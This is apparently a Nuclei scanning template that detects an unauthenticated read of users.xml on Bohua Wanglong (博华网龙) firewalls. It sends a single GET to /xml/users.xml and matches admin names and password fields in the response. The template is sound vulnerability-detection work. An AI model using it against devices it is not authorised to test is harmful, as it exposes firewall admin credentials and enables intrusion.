id: bohuawanglong-users-xml-password-leak

info:
  name: 博华网龙防火墙 users.xml 未授权访问
  author: SleepingBag945
  severity: high
  description: |-
    博华网龙防火墙 users.xml文件 可被任意用户读取，其中包含登录的账号密码
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/%E5%8D%9A%E5%8D%8E%E7%BD%91%E9%BE%99/%E5%8D%9A%E5%8D%8E%E7%BD%91%E9%BE%99%E9%98%B2%E7%81%AB%E5%A2%99%20users.xml%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.html

http:
  - raw:
      - |
        GET /xml/users.xml HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - 'name="admin"'
        part: body
      - type: word
        words:
          - 'pwd="'
        part: body